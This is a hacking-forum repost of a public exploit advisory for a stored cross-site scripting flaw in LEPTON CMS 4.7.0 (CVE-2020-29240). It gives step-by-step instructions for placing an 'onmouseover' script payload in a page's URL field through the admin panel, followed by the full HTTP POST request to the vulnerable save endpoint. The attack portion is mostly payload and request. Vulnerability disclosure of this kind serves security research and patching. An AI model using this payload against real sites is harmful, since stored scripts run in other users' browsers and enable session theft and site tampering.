Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

LEPTON CMS 4.7.0 - 'URL' Persistent Cross-Site Scripting


Recommended Posts

# Exploit Title: LEPTON CMS 4.7.0  - 'URL' Persistent Cross-Site Scripting
# Date: 19-11-2020
# Exploit Author: Sagar Banwa
# Vendor Homepage: https://lepton-cms.org/
# Software Link: https://lepton-cms.org/english/download/archive.php
# Version: 4.7.0
# Tested on: Windows 10/Kali Linux
# CVE: CVE-2020-29240

Stored Cross-site scripting(XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.

Vulnerable Parameters: Pages URL.

1. Login to the Admin Account 
2. Go to the Menu-Pages-Pages Overview.
3. Now edit any page
4. Put the below payload in the url input box.
5.ex. https://localhost/_packinstall/"onmouseover=prompt(/xss/)>

POST /LEPTONmvkzycfafg/modules/wrapper/save.php?leptoken=a8274f4a99bb3c2d1d857z1606411062 HTTP/1.1
Host: localhost
Connection: close
Content-Length: 130
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://localhost/LEPTONmvkzycfafg/backend/pages/modify.php?page_id=1&leptoken=33bfc986e094ce5dd7655z1606411059
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: lep5031sessionid=75627dd11a0e789c4e560f7a93cd3153

Link to post
Link to comment
Share on other sites


discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    • Create New...